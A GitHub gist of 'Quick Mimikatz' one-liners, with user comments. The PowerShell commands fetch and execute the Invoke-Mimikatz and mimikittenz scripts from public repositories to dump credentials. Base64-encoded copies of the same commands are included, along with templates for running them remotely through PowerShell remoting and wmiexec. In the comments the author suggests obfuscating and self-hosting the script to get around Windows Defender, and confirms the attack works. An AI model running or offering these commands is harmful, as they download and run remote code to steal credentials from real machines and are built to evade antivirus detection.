Skip to content

Instantly share code, notes, and snippets.

@gfoss
Last active July 14, 2024 13:03
Show Gist options
  • Save gfoss/ca6aa37f97fd400ff14f to your computer and use it in GitHub Desktop.
Save gfoss/ca6aa37f97fd400ff14f to your computer and use it in GitHub Desktop.
Quick Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz [local]
IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -Command privilege::debug; Invoke-Mimikatz -DumpCreds;
#encoded-mimikatz [local]
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AQgBDAC0AUwBFAEMAVQBSAEkAVABZAC8ARQBtAHAAaQByAGUALwBtAGEAcwB0AGUAcgAvAGUAbQBwAGkAcgBlAC8AcwBlAHIAdgBlAHIALwBkAGEAdABhAC8AbQBvAGQAdQBsAGUAXwBzAG8AdQByAGMAZQAvAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAvAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6AC4AcABzADEAIgApADsAIABJAG4AdgBvAGsAZQAtAE0AaQBtAGkAawBhAHQAegAgAC0AQwBvAG0AbQBhAG4AZAAgAHAAcgBpAHYAaQBsAGUAZwBlADoAOgBkAGUAYgB1AGcAOwAgAEkAbgB2AG8AawBlAC0ATQBpAG0AaQBrAGEAdAB6ACAALQBEAHUAbQBwAEMAcgBlAGQAcwA7AA==
#ps remoting [remote]
Invoke-Command -ComputerName <IP-Address> -ScriptBlock {powershell etc...}
#impacket's wmiexec.py [remote]
wmiexec.py <USER:PASSWORD@IP-Address> "powershell -enc powershell etc..."
#mimikittenz [local]
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1'); Invoke-mimikittenz
#encoded-mimikittenz [local]
powershell -enc SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcHV0dGVycGFuZGEvbWltaWtpdHRlbnovbWFzdGVyL0ludm9rZS1taW1pa2l0dGVuei5wczEnKTsgSW52b2tlLW1pbWlraXR0ZW56Cg==
@gfoss
Copy link
Author

gfoss commented Jan 3, 2020

Yeah - if you have Windows Defender enabled, this will not work, unfortunately. They flag on mimikatz in all the many ways you can utilize the tool... One method that still works is obfuscating the Invoke-Mimikatz.ps1 script and hosting this on your own server. That is outside of the scope of this gist though, this is mainly to show how mimikatz works via quick proof of concept.

@rexbutz
Copy link

rexbutz commented Jan 11, 2022

These seem to no longer be working now.

@gfoss
Copy link
Author

gfoss commented Jan 12, 2022

Thanks for the heads-up @rexbutz! I've updated this to point to the correct Empire repository and have verified that the attack now works as intended. That said, it will only be successful if Microsoft's real-time protection is disabled, other antivirus software is in use, or you get creative.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment